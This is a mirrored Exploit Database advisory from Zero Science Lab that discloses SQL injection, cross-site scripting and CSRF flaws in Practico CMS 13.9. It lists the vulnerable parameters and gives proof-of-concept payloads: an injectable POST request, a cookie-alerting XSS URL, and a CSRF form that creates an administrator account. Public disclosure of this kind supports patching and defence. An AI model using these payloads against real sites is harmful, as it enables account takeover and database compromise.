Practico 13.9 – Multiple Vulnerabilities

• Exploit Database
• 9 阅读

• 作者： LiquidWorm
  日期： 2013-11-03
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/29389/

• 
  Practico 13.9 Multiple Vulnerabilities
  
  
  Vendor: Practico
  Product web page: http://www.codigoabierto.org
  Affected version: 13.9
  
  Summary: Practico is a free CMS software project released under
  licenseGNU GPL v2.0for creating web applications in a completely
  visual and fast fashion. Without programming knowledge.
  
  Desc: Practico suffers from multiple vulnerabilities including
  Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site
  Request Forgery (CSRF/XSRF). The application allows users to perform
  certain actions via HTTP requests without performing any validity
  checks to verify the requests. This can be exploited to perform
  certain actions with administrative privileges if a logged-in user
  visits a malicious web site. Input passed via several parameters is
  not properly sanitized before being returned to the user or used in
  SQL queries. This can be exploited to manipulate SQL queries by
  injecting arbitrary SQL code and HTML/script code in a user's browser
  session in context of an affected site.
  
  Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
   Apache 2.4.2 (Win32)
   PHP 5.4.7
   MySQL 5.5.25a
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2013-5160
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5160.php
  
  Vendor: http://www.codigoabierto.org/anuncios/nuevaversion13911
  http://sourceforge.net/projects/practico/files/Parches_de_Actualizacion/
  
  
  
  10.10.2013
  
  --
  
  
  =================================================================
  |SQL Injection Params (POST)| XSS Params (GET)|
  =================================================================
  | | |
  | accionbuscar| accion|
  | alias_manual| accionbuscar|
  | alto| error_descripcion |
  | ancho | error_titulo|
  | ano | fin_reg |
  | categoria | id|
  | columna | informe |
  | comando | inicio_reg|
  | descripcion | login_filtro|
  | diaf| nombre_filtro |
  | diai| objeto|
  | fin_reg | tabla_datos |
  | formato_final | |
  | genera_pdf| |
  | id| |
  | imagen| |
  | informe | |
  | inicio_reg| |
  | login | |
  | login_filtro| |
  | mesf| |
  | mesi| |
  | nivel_usuario | |
  | nombre_filtro | |
  | nombre_tabla| |
  | padre | |
  | peso| |
  | posible_arriba| |
  | posible_centro| |
  | posible_clic| |
  | posible_escritorio| |
  | seccion | |
  | tabla_datos | |
  | tabla_manual| |
  | texto | |
  | tipo_comando| |
  | titulo| |
  | url | |
  | usuario | |
  | | |
  =================================================================
  
  
  ---------
  SQLi PoC:
  ---------
  
  POST /practico/ HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/practico/
  Cookie: __utma=1.1386375274.1372170047.1372170047.1372170047.1; __utmz=1.1372170047.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookies_accepted=yes; pun_cookie_e516be=1%7C93436127b7acec38d75088212a8649c4eb3c9e84%7C1406252203%7C9f9c497d5b3e089bf8bb1e2f145e599fa095c746; PHPSESSID=6e2rs9td58ardofhso3gm63421
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 145
  
  accion=guardar_informe&titulo=asdasd&descripcion=asdasd&categoria=asdasd&nivel_usuario=-1&ayuda_imagen=&ancho=&alto=[SQL Injection]&formato_final=T&genera_pdf=N
  
  
  --------
  XSS PoC:
  --------
  
  GET /practico/?accionbuscar=&usuario=&diai=09&mesi=10&diaf=09&mesf=10&ano=2013&accion=ver_seguimiento_general&inicio_reg=0&fin_reg=50"><script>alert(document.cookie);</script>
  
  
  -------------------
  CSRF Add Admin PoC:
  -------------------
  
  <html>
  <body>
  <form action="http://localhost/practico/" method="POST">
  <input type="hidden" name="accion" value="guardar_usuario" />
  <input type="hidden" name="login" value="hacker" />
  <input type="hidden" name="nombre" value="Testingus2" />
  <input type="hidden" name="descripcion" value="ZSL" />
  <input type="hidden" name="clave" value="hacker" />
  <input type="hidden" name="seguridad" value="0" />
  <input type="hidden" name="clave1" value="hacker" />
  <input type="hidden" name="correo" value="thricer@it.com.mk.ar" />
  <input type="hidden" name="estado" value="1" />
  <input type="hidden" name="nivel" value="5" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>